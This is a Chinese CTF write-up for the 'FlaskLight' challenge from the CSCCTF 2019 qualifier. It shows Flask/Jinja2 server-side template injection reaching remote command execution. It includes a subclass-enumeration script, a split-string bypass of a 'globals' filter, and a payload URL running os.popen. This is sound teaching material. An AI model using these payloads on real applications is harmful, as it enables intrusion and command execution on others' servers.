CSCCTF 2019 Qual FlaskLight


网页里有提示

参数为search,GET传值

测试49

存在SSTI模板注入,在这里简单介绍python魔法函数,与Flask内置

__class__ 返回类型所属的对象

__mro__ 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。

__base__ 返回该对象所继承的基类 // __base__和__mro__都是用来寻找基类的

__bases__以元组的形式返回一个类所继承的类

__subclasses__ 每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表

__init__ 类的初始化方法

__globals__ 对包含函数全局变量的字典的引用

在python中''包住的是字符串,他的类就是str,传入测试一下

果然回显了,往上找这个类的基类

python中每个类都属于object,所以我们定位到object类,再输出object下所有子类,注意__subclasses__后面有个(),代表他是调用这个方法

我们需要找到能够执行系统命令的,Ctrl+F查找常用的,发现有Popen

那这里我们可以尝试利用Popen下的os模块,但是这里我们用一个脚本,把当前所有类的模块都查一遍

每个模块可在类的__init__.__globals__下找到,但是这里globals被禁了,只要有这个词就返回500,所以把globals拆开再用+号相连,这个时候不需要前面的点

脚本

import time
import requests

for i in range(0, 300):
    url = "http://932e9ea4-5fd2-4011-8ac4-f4ad790fd8bc.node4.buuoj.cn:81/?search={{''.__class__.__mro__[2].__subclasses__()[%d].__init__['__glob'+'als__']}}" % i
    time.sleep(0.1)
    r = requests.get(url)

    if r.text.find("os") != -1:
        print(i)

运行脚本等待一会,会输出所有包含os模块的类,大约几十个,随便用一个

然后就是调用os模块,构造os.popen('ls').read(),造成RCE

http://932e9ea4-5fd2-4011-8ac4-f4ad790fd8bc.node4.buuoj.cn:81/?search={{''.__class__.__mro__[2].__subclasses__()[180].__init__["__glob"+"als__"]['os'].popen('ls').read()}}

发现有flasklight目录

ls flasklight发现有个coomme_geeeett_youur_flek

直接cat

这里提一下os.system与os.popen的区别

os.system返回的是状态码,此命令执行成功返回0,但不显示命令执行后的结果,比如ls,它回显一个0,但是无法查看ls的结果

os.popen可以看到命令回显,使用read()方法即可读取到


文章作者: Tajang
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Tajang !
评论
  目录